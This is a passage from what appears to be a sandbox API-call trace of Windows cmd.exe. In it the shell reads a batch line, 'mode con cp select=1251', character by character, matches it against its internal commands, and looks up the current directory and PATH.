lpWideCharStr=0x7ff7dbbb3c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0290.783] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.783] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.783] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.783] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0290.784] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.784] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.784] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.784] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0290.784] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.784] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.784] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.784] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0290.784] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.784] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.784] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.784] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0290.784] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.784] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.784] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.784] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0290.784] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.785] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.785] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.785] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0290.785] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.785] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.785] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.785] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0290.785] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.785] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.785] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.785] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c42, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0290.785] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.785] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.785] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.785] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0290.785] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.785] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.786] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.786] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0290.786] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.786] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.786] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.786] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0290.786] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.786] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.786] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.786] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0290.786] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.786] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.786] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0290.787] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.787] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.787] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0290.787] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.787] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.787] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0290.787] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.787] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.787] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0290.788] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.788] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.788] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0290.788] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.788] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.788] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.788] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0290.788] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.788] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.789] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0290.789] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.789] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.789] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0290.789] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.789] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.789] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0290.790] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.790] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.790] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0290.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0290.791] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.791] GetFileType (hFile=0x248) returned 0x3 [0290.791] _get_osfhandle (_FileHandle=0) returned 0x248 [0290.791] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0290.791] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.791] GetFileType (hFile=0x254) returned 0x3 [0290.791] _get_osfhandle (_FileHandle=1) returned 0x254 [0290.791] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0290.792] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x202efdf928, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf928*=0x18, lpOverlapped=0x0) returned 1 [0290.792] GetProcessHeap () returned 0x1b843bf0000 [0290.792] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x4012) returned 0x1b843bf8e90 [0290.792] GetProcessHeap () returned 0x1b843bf0000 [0290.792] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf8e90) returned 1 [0290.793] _wcsicmp (_String1="mode", _String2=")") returned 68 [0290.793] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0290.793] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0290.793] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0290.793] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0290.793] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0290.793] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0290.793] GetProcessHeap () returned 0x1b843bf0000 [0290.793] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xb0) returned 0x1b843bf7340 [0290.793] GetProcessHeap () returned 0x1b843bf0000 [0290.793] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x1a) returned 0x1b843bf75e0 [0290.794] GetProcessHeap () returned 0x1b843bf0000 [0290.794] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x38) returned 0x1b843bf7610 [0290.795] GetConsoleOutputCP () returned 0x1b5 [0291.161] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7dbbafbb0 | out: lpCPInfo=0x7ff7dbbafbb0) returned 1 [0291.161] SetThreadUILanguage (LangId=0x0) returned 0x409 [0291.624] GetConsoleTitleW (in: lpConsoleTitle=0x202efdf770, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0292.147] malloc (_Size=0xffce) returned 0x1b843de0840 [0292.147] ??_V@YAXPEAX@Z () returned 0x1b843de0840 [0292.209] malloc (_Size=0xffce) returned 0x1b843df0820 [0292.210] ??_V@YAXPEAX@Z () returned 0x1b843df0820 [0292.211] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0292.211] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0292.211] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0292.211] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0292.211] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0292.211] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0292.211] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0292.211] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0292.211] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0292.211] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0292.211] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0292.211] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0292.211] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0292.211] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0292.211] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0292.211] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0292.211] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0292.211] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0292.211] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0292.211] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0292.211] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0292.211] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0292.211] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0292.211] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0292.211] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0292.211] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0292.212] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0292.212] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0292.212] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0292.212] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0292.212] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0292.212] _wcsicmp (_String1="mode", _String2="START") returned -6 [0292.212] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0292.212] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0292.212] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0292.212] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0292.212] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0292.212] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0292.212] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0292.212] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0292.212] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0292.212] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0292.212] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0292.212] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0292.212] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0292.212] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0292.212] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0292.212] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0292.212] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0292.212] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0292.212] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0292.212] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0292.212] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0292.212] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0292.212] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0292.213] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0292.213] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0292.213] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0292.213] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0292.213] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0292.213] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0292.213] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0292.213] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0292.213] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0292.213] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0292.213] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0292.213] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0292.213] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0292.213] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0292.213] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0292.213] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0292.213] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0292.213] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0292.213] _wcsicmp (_String1="mode", _String2="START") returned -6 [0292.213] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0292.213] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0292.213] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0292.213] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0292.213] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0292.213] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0292.213] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0292.214] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0292.214] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0292.214] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0292.214] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0292.214] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0292.214] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0292.214] ??_V@YAXPEAX@Z () returned 0x1 [0292.214] GetProcessHeap () returned 0x1b843bf0000 [0292.214] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xffde) returned 0x1b843bf8e90 [0292.215] GetProcessHeap () returned 0x1b843bf0000 [0292.215] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x42) returned 0x1b843bf6490 [0292.216] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0292.216] malloc (_Size=0xffce) returned 0x1b843df0820 [0292.216] ??_V@YAXPEAX@Z () returned 0x1b843df0820 [0292.216] GetProcessHeap () returned 0x1b843bf0000 [0292.216] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x1ffac) returned 0x1b843c08e80 [0292.219] SetErrorMode (uMode=0x0) returned 0x0 [0292.219] SetErrorMode (uMode=0x1) returned 0x0 [0292.219] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1b843c08e90, lpFilePart=0x202efdeff0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x202efdeff0*="system32") returned 0x13 [0292.219] SetErrorMode (uMode=0x0) returned 0x1 [0292.220] GetProcessHeap () returned 0x1b843bf0000 [0292.220] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843c08e80, Size=0x42) returned 0x1b843c08e80 [0292.220] GetProcessHeap () returned 0x1b843bf0000 [0292.220] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c08e80) returned 0x42 [0292.220] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0292.220] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0292.220] GetProcessHeap () returned 0x1b843bf0000 [0292.220] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x1b6) returned 0x1b843bf77c0 [0292.221] GetProcessHeap () returned 0x1b843bf0000 [0292.221] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x35c) returned 0x1b843c08ee0 [0292.232] GetProcessHeap () returned 0x1b843bf0000 [0292.232] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, 